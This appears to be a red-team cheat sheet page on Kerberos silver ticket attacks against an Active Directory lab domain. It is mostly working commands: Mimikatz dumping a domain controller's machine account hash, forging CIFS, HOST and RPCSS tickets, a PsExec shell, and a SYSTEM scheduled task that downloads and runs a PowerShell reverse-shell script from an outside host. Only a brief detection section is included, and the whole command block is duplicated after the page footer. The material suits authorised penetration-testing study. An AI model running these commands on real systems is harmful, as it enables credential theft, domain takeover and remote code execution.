Silver Tickets

General

A valid TGS
Encrypted and signed by NTLM hash of the target service account
Services rarely check PAC (Privileged Attribute Certificate)
Services will allow access only to the services themselves
Reasonable persistence period (detauled 30 days for computer accounts)

Exploitation

Arguments

Argument

Description

Commands

# Check Kerberos ticket policy using PowerView
(Get-DomainPolicy -Domain lab.local)."Kerberos Policy"

# Execute mimikatz on DC as DA to get dcorp-dc$ (machine account) hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch /user:dcorp-dc$"' -ComputerName "dcorp-dc"

# Using hash of the DC computer account, below command provides access to shares on the DC
# Similar command can be used for any other service on a machine
# Example services: HOST, RPCSS, WSMAN
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /user:Administrator /service:CIFS /rc4:d32ef7a25657da14a143e0185488a1a3 /ptt"'

# Use proper values from kerberos policy and AES keys to be stealthier
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /user:Administrator /service:CIFS /rc4:d32ef7a25657da14a143e0185488a1a3 /aes128:AES128KEY /aes256:AES256KEY /ptt"'

# Get shell through PsExec
.\PsExec.exe -AcceptEULA \\dcorp-dc.dollarcorp.moneycorp.local cmd

Getting Command Execution

Scheduled Tasks through HOST Service

# Create silver ticket for the HOST SPN which will allow us to schedule a task on the target
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /user:Administrator /service:HOST /rc4:d32ef7a25657da14a143e0185488a1a3 /ptt"'

# Create scheduled task
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.72/Invoke-PowerShellTcp.ps1''')'"

# Run task on the target
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"

# Clean Up
schtasks /delete /tn "STCheck" /s dcorp-dc.dollarcorp.moneycorp.local /f

WMI

# Create two tickets - one for HOST service and another for RPCSS
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /user:Administrator /service:HOST /rc4:d32ef7a25657da14a143e0185488a1a3 /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /user:Administrator /service:RPCSS /rc4:d32ef7a25657da14a143e0185488a1a3 /ptt"'

# Run WMI commands on DC
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Detection

Event IDs:
- 4624: Account Logon
- 4634: Account Logoff
- 4672: Admin Logon

Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *

PreviousGolden Tickets NextACL Attacks

Last updated 1 year ago

Exploitation

Arguments

Argument

Description

Commands

# Check Kerberos ticket policy using PowerView
(Get-DomainPolicy -Domain lab.local)."Kerberos Policy"

# Execute mimikatz on DC as DA to get dcorp-dc$ (machine account) hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch /user:dcorp-dc$"' -ComputerName "dcorp-dc"

# Using hash of the DC computer account, below command provides access to shares on the DC
# Similar command can be used for any other service on a machine
# Example services: HOST, RPCSS, WSMAN
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /user:Administrator /service:CIFS /rc4:d32ef7a25657da14a143e0185488a1a3 /ptt"'

# Use proper values from kerberos policy and AES keys to be stealthier
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /user:Administrator /service:CIFS /rc4:d32ef7a25657da14a143e0185488a1a3 /aes128:AES128KEY /aes256:AES256KEY /ptt"'

# Get shell through PsExec
.\PsExec.exe -AcceptEULA \\dcorp-dc.dollarcorp.moneycorp.local cmd

Getting Command Execution

Scheduled Tasks through HOST Service

# Create silver ticket for the HOST SPN which will allow us to schedule a task on the target
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /user:Administrator /service:HOST /rc4:d32ef7a25657da14a143e0185488a1a3 /ptt"'

# Create scheduled task
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.72/Invoke-PowerShellTcp.ps1''')'"

# Run task on the target
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"

# Clean Up
schtasks /delete /tn "STCheck" /s dcorp-dc.dollarcorp.moneycorp.local /f

WMI

# Create two tickets - one for HOST service and another for RPCSS
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /user:Administrator /service:HOST /rc4:d32ef7a25657da14a143e0185488a1a3 /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /user:Administrator /service:RPCSS /rc4:d32ef7a25657da14a143e0185488a1a3 /ptt"'

# Run WMI commands on DC
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local